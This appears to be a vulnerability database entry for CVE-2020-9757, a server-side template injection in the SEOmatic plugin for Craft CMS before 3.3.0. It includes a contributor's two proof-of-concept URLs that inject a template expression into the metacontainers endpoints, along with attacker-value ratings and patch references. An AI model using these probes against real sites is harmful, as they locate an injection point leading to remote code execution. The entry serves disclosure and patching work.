The SEOmatic component before 3.3.0 for Craft CMS allows Server-Side Template Injection that leads to RCE via malformed data to the metacontainers controller.
Recent assessments:
Mad-robot at July 05, 2020 1:31pm UTC reported:
Description-
The SEOmatic component before 3.3.0 for Craft CMS allows Server-Side Template Injection that leads to RCE via malformed data to the metacontainers controller.
POC-
HTTP://localhost/actions/seomatic/meta-container/meta-link-container/?uri={{7+'7'}}
HTTP://localhost/actions/seomatic/meta-container/all-meta-containers?uri={{7+'7'}}
Assessed Attacker Value: 4
Assessed Attacker Value: 4Assessed Attacker Value: 5
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9757
github.com/giany/CVE/blob/master/CVE-2020-9757.txt
github.com/nystudio107/craft-seomatic/blob/v3/CHANGELOG.md
github.com/nystudio107/craft-seomatic/commit/65ab659cb6c914c7ad671af1e417c0da2431f79b
github.com/nystudio107/craft-seomatic/commit/a1c2cad7e126132d2442ec8ec8e9ab43df02cc0f